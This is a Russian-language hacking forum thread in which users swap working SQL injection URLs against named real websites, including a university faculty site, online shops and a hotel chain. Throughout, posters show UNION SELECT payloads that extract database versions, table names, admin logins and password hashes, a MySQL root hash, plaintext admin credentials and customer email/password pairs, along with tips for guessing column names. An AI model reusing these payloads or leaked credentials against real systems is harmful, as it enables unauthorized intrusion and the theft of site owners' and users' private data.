SQL Инъекции

Code:

http://www.realmusic.ua/catalog/more.php?id=-57+union+select+1,2,3/*

 

хз что здесь мона сделать

Code:

__http://www.lotok.com.ua/auctiondetails.php?id=57739'+union+select+1/*
__http://www.yurpraktika.com/article.php?id=10007144'
__http://www.johnkeellshotels.com/beach_hotels/hotel_home.php?id=-1'

тут не нашел ничего интересного, судя по названиям таблиц, они больше отдыхают чем работают

Code:

__http://www.stcu.int/news/index.php?id=921%20or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('WinterPicnic2007','WinterPicnic2006','WebSite','Vacancies','v_Partners','v_Holidays','v_FieldOfficesReport','v_Autumn2004Results','syssegments','sysconstraints','SummerPicnic2005','SummerPicnic2004','SuccessStoryProjects','SuccessStory','SpringPicnic2006p2','SpringPicnic2006','Sections','RecentNewsandEvents','Procurement','Picnic','phone','Partners','PartnerContacts','links','Holidays','FieldOfficesReport','faxes','E_mails','dtproperties','Content','conference','Competition','BusReservation','Bowling','AutumnPicnic2005p2','AutumnPicnic2005','Organizer','Articles','AutumnPicnic2004'))--

понравилась вот эта скуля, но до ума не смог довести

Code:

__http://www.foto-svadba.com/photographer.php?id=24+union+select+1,2,3,4,5,6,7,8,9,10,11/*

 

http://phpinside.org.ua - украинский сервер небезизвестного журнала PHPInside

Code:

http://phpinside.org.ua/index.php?mode=download&id=-1+union+select+1,convert(user()+using+cp1251)/*

inside@localhost

Code:

http://phpinside.org.ua/index.php?mode=download&id=-1+union+select+1,convert(version()+using+cp1251)/*

4.1.14

смотреть татйт =)

 

http://www.partsinfo.ru/news.php?nid=-1+union+select+1,2,3,concat_ws(0x3a,login,password,email,name),5,6,7+from+users/*

странно у меня получилось

Code:

http://www.foto-svadba.com/photographer.php?id=-1+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,user_name,user_password,email),9,10,11+from+users+limit+1,1/*

 

http://cards.udaff.com/viewcat.php?id=7+order+by+1/*
/home/udaff.com/cards/cards.udaff.com/functions.php
cards@devil
http://cards.udaff.com/viewcat.php?id=-7+union+select+VERSION()/*
5.0.32-Debian_7etch1-log

http://cards.udaff.com/viewcat.php?id=-7+union+select+1+from+mysql.user/*
http://cards.udaff.com/viewcat.php?id=-7+union+select+table_name+from+information_schema.tables/*
http://cards.udaff.com/viewcat.php?id=-7+union+select+table_name+from+information_schema.tables+limit+1,1/*

http://cards.udaff.com/viewcat.php?id=-7+union+select+table_name+from+information_schema.tables+limit+16,1/*
cards_cards
cards_cats
cards_comments
cards_log
helen
Admins
Articles

Поля в таблице admins не искал.
PS: IP на один меньше оригинального удава.
PPS: Тут намекают, что боян. Если так - извиняйте. анриал искать боян или нет по все теме.

 

держи

Code:

http://stopusa.be/scripts/texte.php?section=&langue=3&id=-25094+union+select+1,aid,passwd,4,5,6,7,8,9,10+from+users/*

http://stopusa.be/scripts/admin
User: Roland
Pass: katakas

 

Code:

http://www.liliande.com/main.html?id=5&taal_id=9999999+union+select+1,2,3,4,convert(concat(version(),char(58),user(),char(58),database())+using+latin1),6,7/*

 

2VampiRUS,_Pantera_
а

Code:

http://www.yurpraktika.com/article.php?id=10007200'

че не позубам?

правда таблицы не нашел но хоть что то

Code:

http://www.yurpraktika.com/article.php?id=10007200+and+10007200=-10007200+union+select+1,2,3,4,5,null,user(),8,9,10,database(),version(),13,14,15,null,17,18,19,20,21,22,null,null,25,null/*

красава

 

Code:

http://uralmag.ru/index.html?col=1&tovar_id=-1+union+select+1,2,concat(database(),char(58),user(),char(58),version()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*
http://uralmag.ru/index.html?col=1&tovar_id=-1+union+select+1,2,concat(clients_fio,char(58),clients_phone,char(58),clients_login,char(58),clients_password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+clients+limit+0,1/*

 

Филосовский факультет МГУ. http://www.philos.msu.ru/
Видно что философы, а не пхп кодеры
Скуль:

Колумны:

Версия мускула 5.0.27 :

Следовательно:

Колонка CHARACTER_SET_NAME
Таблица CHARACTER_SETS
Так что только:

=\

 

Ой, чувствую не поймут меня =)

 

Code:

http://photo.dive.kz/photo.php?id=-784+union+select+1,2,3,concat(database(),0x3a,user(),0x3a,version()),5,6/*

 

Какой то векторлинукс, в первый раз слышу. http://vectorlinux.com/ Ну да пох=\

Скуль:

Колумны:

Версия 4.1.20:

Т.к. мускул ниже 5 ветки, то тупо перебераем таблицы.

Что бы небыло ебли с именами колонок, смотрим форму авторизации:

HTML:

	Nickname: <input type="text" name="uname" size="12" maxlength="25" /><br />

	Password: <input type="password" name="pass" size="12" maxlength="20" /><br />

Ибо:

Tigger:dd0ced770c9b3a5209a1c48dba1c6d86

Всё=\

 

Code:

http://www.antikvar.su/index.php?http_id_part=77&http_id_prod=-1+union+select+1,concat(database(),char(58),user(),char(58),version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/*
http://www.antikvar.su/index.php?http_id_part=77&http_id_prod=-1+union+select+1,concat(client,char(58),phone),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+request+limit+0,1/*

Code:

http://www.baltex.ru/rus/news/region/yug/?id=-1+union+select+1,2,3,concat(database(),char(58),user(),char(58),version()),5,6,7,8/*
http://www.baltex.ru/rus/news/region/yug/?id=-1+union+select+1,2,3,table_name,5,6,7,8+from+information_schema.tables+limit+38,1/*

Code:

http://kvadroplast.perm.ru/catalog.html?cat=-1+union+select+1,2,3,concat(database(),char(58),user(),char(58),version()),5,6,7,8/*

Кстати я тоже имена колонок смотрю в исходниках формы - почти всегда прокатывает, и ни какие информатион_счема не нужны, хотя с ними тоже не плохо))

 

Add:
Хотя если поиграть с лимитами, выдаёт другого юзера:

 

ЛОЛ =D
а лимит уже не рулит что ли?
http://www.philos.msu.ru/library.php?sid=-1+union+select+1,2,TABLE_NAME,4,5,6,7,8,9,10,11+fr om+INFORMATION_SCHEMA.TABLES+limit+1,1/*

 

И это чем то помогло? =\

 

омфг, Слип. Иди статью Зако почитай =\

 

Поздравьте меня! Мой первый скуль :

Поле там вроди одно

 

меня глючит или пароль не выведен? колонка 'passw'

Code:

http://www.philos.msu.ru/library.php?sid=-1+union+select+1,2,concat(login,0x3a,passw),4,5,6,7,8,9,10,11+from+users/*

admin:a98948bf0421ef30e4e19c0b4844600d


ну и от меня еще:
restko.ru

Code:

http://www.restko.ru/index.php?level=99&info=-99+union+select+convert(concat(user,0x3a,password)+using+cp1251)+from+mysql.user/*

root_s194u:*FB96B86F2CB3B44E1F1854B65E4333A1649F186B
к мускул..

Code:

http://www.restko.ru/index.php?level=99&info=-99+union+select+convert(concat(email,0x3a,pass)+using+cp1251)+from+user/*

пароли в чистом виде.. пример - [email protected]:rel021


//upd:

а вроде нет.. двадцать два

Code:

http://www.russianst.com/mobile/phone.php?p=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/*

дальше сам думай)